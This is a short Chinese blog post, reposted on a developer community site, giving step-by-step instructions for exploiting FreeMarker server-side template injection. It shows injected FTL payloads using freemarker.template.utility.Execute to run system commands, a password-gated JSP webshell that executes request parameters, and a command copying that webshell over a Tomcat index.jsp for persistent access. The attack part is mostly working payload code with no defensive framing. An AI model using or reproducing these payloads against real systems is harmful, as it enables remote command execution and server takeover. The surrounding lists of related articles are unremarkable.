备案控制台

开发者社区

开发者社区云计算文章正文

FreeMarker执行系统命令

2017-11-16 2200

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介：

1、寻找可以上传FTL模板的漏洞点

2、尝试注入FTL模板

 
        <#assign test="freemarker.template.utility.Execute"?new()>
       
        ${test("id")}

3、查找上传的FTL文件保存路径

 
        <#assign test="freemarker.template.utility.Execute"?new()>
       
        ${test("find / -name *.ftl")}

4、获取WebShell

 
        # webshell.ftl
       
        <%if ("023".equals(request.getParameter("pwd")))
       
        {java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
       
        int a = -1; byte[] b = new byte[2048];while((a=in.read(b))!=-1){out.println(new String(b));}}%>

 
        # main.ftl
       
        <#assign test="freemarker.template.utility.Execute"?new()>
       
        ${test("cp /home/bmpapp/upc_plugin_home/export_plugin/development/user/webshell.ftl 
       
        /home/bmpapp/tomcat/webapps/default.war/index.jsp")}

5、访问index.jsp

本文转自fatshi51CTO博客，原文链接：http://blog.51cto.com/duallay/1936931 ，如需转载请自行联系原作者

文章标签：

索引

技术小甜

目录

相关文章

风水道人

|

20天前

|

Java Shell

SpringBoot一键停止脚本Shell

SpringBoot一键停止脚本Shell

风水道人

8 0 0

讓丄帝愛伱

|

5月前

|

Java Shell Linux

java执行脚本命令(shell脚本或cmd脚本)

java执行脚本命令(shell脚本或cmd脚本)

讓丄帝愛伱

53 0 0

小小工匠

|

11月前

|

Shell Linux

在 Shell 脚本中执行语法检查调试模式

在 Shell 脚本中执行语法检查调试模式

小小工匠

127 0 0

柳鲲鹏

脚本中调用别的脚本，如何得到执行结果？

脚本中调用别的脚本，如何得到执行结果？

柳鲲鹏

62 0 0

sjf0115

|

Shell

[Shell]获取当前正在执行脚本的绝对路径

1. pwd命令我们看看使用pwd命令能否获取当前正在执行脚本的绝对路径。该命令的作用是“print name of current/working directory”，真实含义是当前工作目录，并不是正在执行脚本的目录。

sjf0115

1721 0 0

韩曙亮

|

Java

【Groovy】Groovy 脚本调用 ( 命令行执行 Groovy 脚本并传入参数 | 获取 Groovy 脚本执行参数 )

【Groovy】Groovy 脚本调用 ( 命令行执行 Groovy 脚本并传入参数 | 获取 Groovy 脚本执行参数 )

韩曙亮

904 0 0

【Groovy】Groovy 脚本调用 ( 命令行执行 Groovy 脚本并传入参数 | 获取 Groovy 脚本执行参数 )

优惠券活动

|

Java Shell 数据安全/隐私保护

Jmeter之Bean shell使用(一)

优惠券活动

1772 0 1

长征2号

|

Java Shell

Jmeter之Bean shell使用(二)

长征2号

19238 0 0

唐玄奘

|

Shell

命令行和ant脚本的参数传递

唐玄奘

1140 0 0

技术小阿哥

|

Shell

crontab中执行脚本中文乱码，手动执行没有问题的解决办法

技术小阿哥

2109 0 0

热门文章

最新文章

随机生成UserAgent的python库（fake-useragent库）

使用zxing识别一幅包含多个二维码的图片

阿里云的SLB，植入cookie和重写cookie有什么区别？

基于Flink的实时日志分析系统实践

如何在服务器上跑python程序

电池技术多年没有较大发展，成为移动设备最大制约

Spread for WinRT 7新功能使用指南

codeforces Soldier and Number Game（dp+素数筛选）

九度oj-1001-Java

Android:随笔——对页面的View进行截图

分解商业周期时间序列：线性滤波器、HP滤波器、Baxter滤波器、Beveridge Nelson分解等去趋势2

分解商业周期时间序列：线性滤波器、HP滤波器、Baxter滤波器、Beveridge Nelson分解等去趋势法1

灰色关联分析(Grey Relation Analysis,GRA)中国经济社会发展指标

极值分析：分块极大值BLOCK-MAXIMA、阈值超额法、广义帕累托分布GPD拟合降雨数据时间序列

GARCH-DCC模型和DCC（MVT）建模估计

ARIMA、ARIMAX、动态回归和OLS 回归预测多元时间序列

R语言预测期货波动率的实现：ARCH与HAR-RV与GARCH，ARFIMA模型比较

spss modeler用决策树神经网络预测ST的股票

K-means和层次聚类分析癌细胞系微阵列数据和树状图可视化比较

matlab中使用VMD(变分模态分解)对信号去噪

相关课程

更多

Shell 脚本入门

相关电子书

更多

低代码开发师（初级）实战教程

冬季实战营第三期：MySQL数据库进阶实战

阿里巴巴DevOps 最佳实践手册

下一篇

阿里云oss简介和使用流程